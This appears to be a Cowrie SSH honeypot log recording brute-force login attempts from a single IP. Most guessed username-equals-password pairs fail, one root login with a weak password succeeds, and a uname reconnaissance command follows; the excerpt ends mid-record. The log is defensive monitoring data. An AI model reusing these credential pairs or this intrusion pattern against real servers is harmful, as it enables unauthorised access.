{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:38:22.351574Z","src_ip":"212.227.125.160","session":"9146466c687a"}
{"eventid":"cowrie.login.failed","username":"cp_extensions","password":"cp_extensions","message":"login attempt [cp_extensions/cp_extensions] failed","sensor":"my-vps","timestamp":"2025-08-26T21:38:23.383284Z","src_ip":"212.227.125.160","session":"9146466c687a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:24.455091Z","src_ip":"212.227.125.160","session":"9146466c687a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36156,"dst_ip":"1.2.3.4","dst_port":22,"session":"a93c33ad8be6","protocol":"ssh","message":"New connection: 212.227.125.160:36156 (1.2.3.4:22) [session: a93c33ad8be6]","sensor":"my-vps","timestamp":"2025-08-26T21:38:27.802477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:38:27.808707Z","src_ip":"212.227.125.160","session":"a93c33ad8be6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:38:27.869320Z","src_ip":"212.227.125.160","session":"a93c33ad8be6"}
{"eventid":"cowrie.login.failed","username":"bitrix","password":"bitrix","message":"login attempt [bitrix/bitrix] failed","sensor":"my-vps","timestamp":"2025-08-26T21:38:28.877235Z","src_ip":"212.227.125.160","session":"a93c33ad8be6"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:29.938245Z","src_ip":"212.227.125.160","session":"a93c33ad8be6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59778,"dst_ip":"1.2.3.4","dst_port":22,"session":"467d1c97ce27","protocol":"ssh","message":"New connection: 212.227.125.160:59778 (1.2.3.4:22) [session: 467d1c97ce27]","sensor":"my-vps","timestamp":"2025-08-26T21:38:33.778289Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:38:33.779484Z","src_ip":"212.227.125.160","session":"467d1c97ce27"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:38:33.855266Z","src_ip":"212.227.125.160","session":"467d1c97ce27"}
{"eventid":"cowrie.login.failed","username":"main","password":"main","message":"login attempt [main/main] failed","sensor":"my-vps","timestamp":"2025-08-26T21:38:33.990864Z","src_ip":"212.227.125.160","session":"467d1c97ce27"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:35.072217Z","src_ip":"212.227.125.160","session":"467d1c97ce27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55164,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4c0e9d8722b","protocol":"ssh","message":"New connection: 212.227.125.160:55164 (1.2.3.4:22) [session: b4c0e9d8722b]","sensor":"my-vps","timestamp":"2025-08-26T21:38:39.522683Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:38:39.523706Z","src_ip":"212.227.125.160","session":"b4c0e9d8722b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:38:39.581483Z","src_ip":"212.227.125.160","session":"b4c0e9d8722b"}
{"eventid":"cowrie.login.failed","username":"factorio","password":"factorio","message":"login attempt [factorio/factorio] failed","sensor":"my-vps","timestamp":"2025-08-26T21:38:39.757522Z","src_ip":"212.227.125.160","session":"b4c0e9d8722b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:40.803234Z","src_ip":"212.227.125.160","session":"b4c0e9d8722b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50554,"dst_ip":"1.2.3.4","dst_port":22,"session":"48dba1573acb","protocol":"ssh","message":"New connection: 212.227.125.160:50554 (1.2.3.4:22) [session: 48dba1573acb]","sensor":"my-vps","timestamp":"2025-08-26T21:38:45.063867Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:38:45.073195Z","src_ip":"212.227.125.160","session":"48dba1573acb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:38:45.109031Z","src_ip":"212.227.125.160","session":"48dba1573acb"}
{"eventid":"cowrie.login.failed","username":"myuser","password":"myuser","message":"login attempt [myuser/myuser] failed","sensor":"my-vps","timestamp":"2025-08-26T21:38:45.291024Z","src_ip":"212.227.125.160","session":"48dba1573acb"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:46.367603Z","src_ip":"212.227.125.160","session":"48dba1573acb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45942,"dst_ip":"1.2.3.4","dst_port":22,"session":"46f67caeb9cd","protocol":"ssh","message":"New connection: 212.227.125.160:45942 (1.2.3.4:22) [session: 46f67caeb9cd]","sensor":"my-vps","timestamp":"2025-08-26T21:38:50.282043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:38:50.283371Z","src_ip":"212.227.125.160","session":"46f67caeb9cd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:38:50.349621Z","src_ip":"212.227.125.160","session":"46f67caeb9cd"}
{"eventid":"cowrie.login.failed","username":"sem8","password":"sem8","message":"login attempt [sem8/sem8] failed","sensor":"my-vps","timestamp":"2025-08-26T21:38:50.526248Z","src_ip":"212.227.125.160","session":"46f67caeb9cd"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:51.654811Z","src_ip":"212.227.125.160","session":"46f67caeb9cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41330,"dst_ip":"1.2.3.4","dst_port":22,"session":"abc6f078386d","protocol":"ssh","message":"New connection: 212.227.125.160:41330 (1.2.3.4:22) [session: abc6f078386d]","sensor":"my-vps","timestamp":"2025-08-26T21:38:55.729690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:38:55.743454Z","src_ip":"212.227.125.160","session":"abc6f078386d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:38:55.775524Z","src_ip":"212.227.125.160","session":"abc6f078386d"}
{"eventid":"cowrie.login.failed","username":"manager","password":"manager","message":"login attempt [manager/manager] failed","sensor":"my-vps","timestamp":"2025-08-26T21:38:55.983616Z","src_ip":"212.227.125.160","session":"abc6f078386d"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:38:57.037775Z","src_ip":"212.227.125.160","session":"abc6f078386d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36716,"dst_ip":"1.2.3.4","dst_port":22,"session":"17930a7e8d41","protocol":"ssh","message":"New connection: 212.227.125.160:36716 (1.2.3.4:22) [session: 17930a7e8d41]","sensor":"my-vps","timestamp":"2025-08-26T21:39:01.197820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:01.289398Z","src_ip":"212.227.125.160","session":"17930a7e8d41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:39:01.291057Z","src_ip":"212.227.125.160","session":"17930a7e8d41"}
{"eventid":"cowrie.login.failed","username":"x2goprint","password":"x2goprint","message":"login attempt [x2goprint/x2goprint] failed","sensor":"my-vps","timestamp":"2025-08-26T21:39:01.584325Z","src_ip":"212.227.125.160","session":"17930a7e8d41"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:02.642147Z","src_ip":"212.227.125.160","session":"17930a7e8d41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60334,"dst_ip":"1.2.3.4","dst_port":22,"session":"aac34e8a426b","protocol":"ssh","message":"New connection: 212.227.125.160:60334 (1.2.3.4:22) [session: aac34e8a426b]","sensor":"my-vps","timestamp":"2025-08-26T21:39:06.433925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:06.441876Z","src_ip":"212.227.125.160","session":"aac34e8a426b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:39:06.488757Z","src_ip":"212.227.125.160","session":"aac34e8a426b"}
{"eventid":"cowrie.login.success","username":"root","password":"A123456a","message":"login attempt [root/A123456a] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:39:06.739249Z","src_ip":"212.227.125.160","session":"aac34e8a426b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:39:06.865594Z","src_ip":"212.227.125.160","session":"aac34e8a426b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:39:06.866317Z","src_ip":"212.227.125.160","session":"aac34e8a426b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:06.915663Z","src_ip":"212.227.125.160","session":"aac34e8a426b"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:39:06.916747Z","src_ip":"212.227.125.160","session":"aac34e8a426b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55724,"dst_ip":"1.2.3.4","dst_port":22,"session":"215706e784b9","protocol":"ssh","message":"New connection: 212.227.125.160:55724 (1.2.3.4:22) [session: 215706e784b9]","sensor":"my-vps","timestamp":"2025-08-26T21:39:11.967295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:39:11.968789Z","src_ip":"212.227.125.160","session":"215706e784b9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 